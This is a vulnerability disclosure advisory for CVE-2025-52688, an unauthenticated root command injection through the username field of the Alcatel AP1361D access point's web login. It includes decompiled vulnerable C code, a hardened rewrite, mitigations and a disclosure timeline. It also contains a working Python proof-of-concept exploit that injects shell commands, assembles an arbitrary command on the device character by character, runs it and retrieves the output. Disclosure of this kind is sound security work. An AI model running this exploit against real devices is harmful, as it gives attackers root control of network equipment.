
CVE-2025-52688: Alcatel AP1361D Command Injection in Web Login

CVSS Score: 9.6 Critical (CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

Product overview

The Alcatel AP1361D is an enterprise WiFi access point.

Analysis and exploitation of this vulnerability were performed on firmware version 4.0.4, build 2046.

Vulnerability summary

The Alcatel AP1361D web API does not sanitize the username specified by the user before using it as part of a system command.

By including special characters such as ; in the username, an unauthenticated attacker can execute arbitrary commands with root privileges on the device.

Vulnerability details

The getSession function, shown below, is called as part of the handler for the JSONRPC method user.login exposed by echo.fcgi, the main binary responsible for handling the access point's HTTP configuration interface.

This function checks whether the user attempting to log in already has an established and valid session on the device.

```c
char *__fastcall getSession(const char *username)
{
  char *v2; // x19
  char cmd_buf[70]; // [xsp+40h] [xbp+40h] BYREF

  log("getSession\n", 0);
  memset(cmd_buf, 0, sizeof(cmd_buf));
  v2 = (char *)malloc(0x55u);
  // Injection point 1: the attacker-controlled username is formatted straight into a shell command
  sprintf(cmd_buf, "uci -c /tmp get sessionId.%s.sessionId 2>&1", username);
  popen(cmd_buf, v2 + 15);
  if ( !strcmp(v2 + 15, "uci: Entry not found")
    || (memset(cmd_buf, 0, sizeof(cmd_buf)),
        // Injection point 2: same pattern for the sessionValidity lookup
        sprintf(cmd_buf, "uci -c /tmp get sessionId.%s.sessionValidity 2>&1", username),
        popen(cmd_buf, v2 + 50),
        !strcmp(v2 + 50, "uci: Entry not found")) )
  {
    free(v2);
    return 0;
  }
  else
  {
    strcpy(v2, username);
    return v2;
  }
}
```

User sessions are managed by the uci binary, which getSession invokes through popen, i.e. through a shell. The username is interpolated directly into the command string in two places (the sessionId lookup and the sessionValidity lookup), so any shell metacharacters it contains are interpreted by the shell, resulting in command injection.

Additionally, as this method is part of the login process, unauthenticated attackers can trivially exploit this vulnerability.
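The two defects in getSession are the shell in the middle (popen) and the absence of any check on the username. The following hardened counterpart is an added example written for this advisory; it is not code from the AP1361D firmware or from Alcatel. It assumes an allowlist of `[A-Za-z0-9_-]` with a 32-byte limit for usernames (a choice made here, not a firmware value), that uci lives at `/sbin/uci`, and that `/bin/echo` exists so the no-shell behaviour can be shown without uci installed. Note that `.` is also rejected, because the username is spliced into a uci key path and a dot would alter the key being looked up even with the shell removed.

```c
#define _POSIX_C_SOURCE 200809L
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Allowlist check applied before the username goes anywhere near a command.
 * Character set and length limit are assumptions for this example, not
 * values taken from the AP1361D firmware. '.' is excluded because the
 * username is embedded in a uci key path ("sessionId.<user>.sessionId"). */
int is_valid_username(const char *u)
{
    size_t n = strlen(u);
    if (n == 0 || n > 32)
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)u[i];
        if (!isalnum(c) && c != '_' && c != '-')
            return 0;
    }
    return 1;
}

/* Shell-free replacement for popen(): fork, exec argv directly, capture the
 * child's stdout and stderr. No shell parses a command line, so ';' or '&&'
 * inside an argument are ordinary bytes. Returns bytes captured, or -1 on
 * fork/pipe failure or when the child could not be exec'd. */
ssize_t run_capture(char *const argv[], char *out, size_t outlen)
{
    int fds[2];
    if (outlen == 0 || pipe(fds) < 0)
        return -1;
    pid_t pid = fork();
    if (pid < 0) {
        close(fds[0]);
        close(fds[1]);
        return -1;
    }
    if (pid == 0) {                       /* child */
        dup2(fds[1], STDOUT_FILENO);
        dup2(fds[1], STDERR_FILENO);
        close(fds[0]);
        close(fds[1]);
        execv(argv[0], argv);
        _exit(127);                       /* exec failed */
    }
    close(fds[1]);                        /* parent */
    size_t total = 0;
    ssize_t r;
    while (total < outlen - 1 &&
           (r = read(fds[0], out + total, outlen - 1 - total)) > 0)
        total += (size_t)r;
    out[total] = '\0';
    close(fds[0]);
    int status = 0;
    waitpid(pid, &status, 0);
    if (!WIFEXITED(status) || WEXITSTATUS(status) == 127)
        return -1;
    return (ssize_t)total;
}

/* Hardened counterpart of getSession(): validate first, then hand the uci key
 * to uci as a single argv element. The /sbin/uci path is an assumption.
 * Returns -1 for a rejected username or exec failure, 0 when uci reports
 * "Entry not found", and 1 when a value came back. */
int get_session_field(const char *username, const char *field, char *out, size_t outlen)
{
    if (!is_valid_username(username))
        return -1;
    char key[128];
    snprintf(key, sizeof key, "sessionId.%s.%s", username, field);
    char *argv[] = { "/sbin/uci", "-c", "/tmp", "get", key, NULL };
    if (run_capture(argv, out, outlen) < 0)
        return -1;
    return strncmp(out, "uci: Entry not found", 20) == 0 ? 0 : 1;
}

int main(void)
{
    char out[256];
    /* Constructed input using the same metacharacters as the PoC: rejected before any exec. */
    printf("get_session_field(\";sh && sleep 1;\") -> %d\n",
           get_session_field(";sh && sleep 1;", "sessionId", out, sizeof out));
    /* Via /bin/echo (assumed present) so this runs without uci: the argument
     * comes back verbatim instead of being interpreted as a command. */
    char *argv[] = { "/bin/echo", ";sh && sleep 1;", NULL };
    run_capture(argv, out, sizeof out);
    printf("echo received the argument unchanged: %s", out);
    return 0;
}
```

The allowlist is the primary control and the argv-based exec is defence in depth: even if a future change loosens the allowlist, removing the shell means there is no parser left to turn a username into a second command.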

PoC script

```python
import sys

import requests
import urllib3

urllib3.disable_warnings(category=urllib3.exceptions.InsecureRequestWarning)

base = "https://10.10.1.103"
url = f"{base}/echo.fcgi"

headers = {
    "Host": "localhost:444",
    "Cookie": "_wnd_size_mode=5; mir_login_type=regular; language=en; __guid=111872281.3214943159562040300.1723347505438.0442; monitor_count=6",
    "Sec-Ch-Ua": '"Not;A=Brand";v="99", "Chromium";v="106"',
    "Accept": "application/json, text/plain, */*",
    "Content-Type": "application/json",
    "Sec-Ch-Ua-Mobile": "?0",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36",
    "Sec-Ch-Ua-Platform": '"Windows"',
    "Origin": "https://localhost:444",
    "Sec-Fetch-Site": "same-origin",
    "Sec-Fetch-Mode": "cors",
    "Sec-Fetch-Dest": "empty",
    "Referer": "https://localhost:444/static/login.html",
    "Accept-Encoding": "gzip, deflate",
    "Accept-Language": "en-GB,en-US;q=0.9,en;q=0.8",
    "Connection": "close"
}

data = {
    "id": 0,
    "jsonrpc": "2.0",
    "session": "",
    "username": ";sh && sleep 1;",
    "method": "downloader.syslog",
    "params": {
        "username": "Administrator",
    }
}


def exploit(s):
    # The username field carries the injected command
    data["username"] = f";{s};"
    requests.post(url, headers=headers, json=data, verify=False)


command = sys.argv[1]

print("Executing", command)
command = f"{command} >& /www/a"
# The command is written to the device one character at a time, then concatenated
for i in range(len(command)):
    exploit(f"echo -n '{command[i]}' > a{i}")

exploit("cp a0 b0")
for i in range(len(command) - 1):
    exploit(f"cat b{i} a{i+1} > b{i+1}")

print("Command written")
exploit(f"sh b{len(command)-1}")

out = requests.get(base + "/a", verify=False).text
print("Command output:")
print(out)
```

Demo video

Exploit conditions

Any unauthenticated attacker with network access to the Alcatel AP1361D device can exploit this vulnerability.

Mitigations

Alcatel recommends that users of the affected product update to the latest version. If updating to the latest version is not possible, the workaround is to manage the affected product in Enterprise Mode with the OmniVista Management platform and disable the web interface.

We are unable to assess the security of the mitigations implemented by Alcatel, as they have not granted us access to the updated firmware.

Timeline

  • 2024-08-11: Report submitted to SpiritCyber IoT Hackathon triage team
  • 2024-08-17: Report accepted by triage team
  • ???
  • 2025-04-21: CSA SingCert requests the firmware version of the affected device on behalf of Alcatel, we respond within the same day
  • 2025-06-25: CSA SingCert assigns CVE-2025-52688
  • 2025-07-16: Public disclosure